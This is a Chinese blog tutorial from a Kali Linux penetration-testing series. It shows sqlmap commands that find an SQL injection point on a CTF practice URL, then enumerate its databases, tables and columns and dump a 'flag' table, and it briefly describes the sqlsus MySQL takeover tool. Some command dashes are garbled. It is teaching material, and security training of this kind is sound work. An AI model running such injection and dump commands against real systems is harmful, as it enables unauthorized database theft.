Kali linux渗透测试系列————20、Kali linux 漏洞映射之诊断数据库漏洞

时间:2024-03-29 07:03:35

前言

服务提供的所有信息保存在数据库中。因此,数据库总会成为攻击者的攻击对象。本节将介绍以数据库为对象,通过网络服务和近场通信网络获取信息的工具。

SQLmap:获取数据库信息

sqlmap是一款开源的渗透测试工具,它可以自动搜索SQL注入漏洞,并自动化攻击数据库服务器。这款功能超强的搜索检测引擎可以从数据库的Fingerprinting(获取信息)向数据库输出数据、访问文件系统、访问频段外区域以执行OS上的命令等。为实施最理想的渗透测试提供了多种便利功能和诸多选项开关。

Kali linux渗透测试系列————20、Kali linux 漏洞映射之诊断数据库漏洞

在上面的截图中给出了sqlmap的使用参考说明,自己也可以在Kali linux的终端输入sqlmap -h 命令进行查看具体信息。

SQLmap实例:

1)在终端输入命令:“Sqlmap.py –u 目标URL  -u扫描注入点扫描目标主机,检测出的信息准确。

Kali linux渗透测试系列————20、Kali linux 漏洞映射之诊断数据库漏洞

(2)爆出数据库:

Sqlmap.py –u  http://ctf5.shiyanbar.com/web/index_3.php?id=1–-dbs

Kali linux渗透测试系列————20、Kali linux 漏洞映射之诊断数据库漏洞

Kali linux渗透测试系列————20、Kali linux 漏洞映射之诊断数据库漏洞

(3)爆表:

Sqlmap.py –u  http://ctf5.shiyanbar.com/web/index_3.php?id=1–D web1 –-tables

Kali linux渗透测试系列————20、Kali linux 漏洞映射之诊断数据库漏洞

Kali linux渗透测试系列————20、Kali linux 漏洞映射之诊断数据库漏洞

(4)爆字段:

Sqlmap.py –u  http://ctf5.shiyanbar.com/web/index_3.php?id=1–D web1 –T flag –-columns 

Kali linux渗透测试系列————20、Kali linux 漏洞映射之诊断数据库漏洞

Kali linux渗透测试系列————20、Kali linux 漏洞映射之诊断数据库漏洞

Kali linux渗透测试系列————20、Kali linux 漏洞映射之诊断数据库漏洞

(5)显示字段值:

Sqlmap.py –u  http://ctf5.shiyanbar.com/web/index_3.php?id=1 –D web1 –T flag –C--dump

Kali linux渗透测试系列————20、Kali linux 漏洞映射之诊断数据库漏洞

Kali linux渗透测试系列————20、Kali linux 漏洞映射之诊断数据库漏洞

sqlsus:把握数据库结构

Sqlsus是基于Perl编写的开源MySQL注入接管(takeover)工具。Sqlsus可通过命令行界面进行数据库结构搜素、数据库复制、sql查询插入、从网络服务器下载文件、网站抓取等等操作。另外sqlsus还提供了MySQL控制台功能,而且能够优质高效、最大限度地发挥MySQL功能。

Kali linux渗透测试系列————20、Kali linux 漏洞映射之诊断数据库漏洞

注意:这个主要是针对数据库的配置文件进行分析来获取相应的信息的!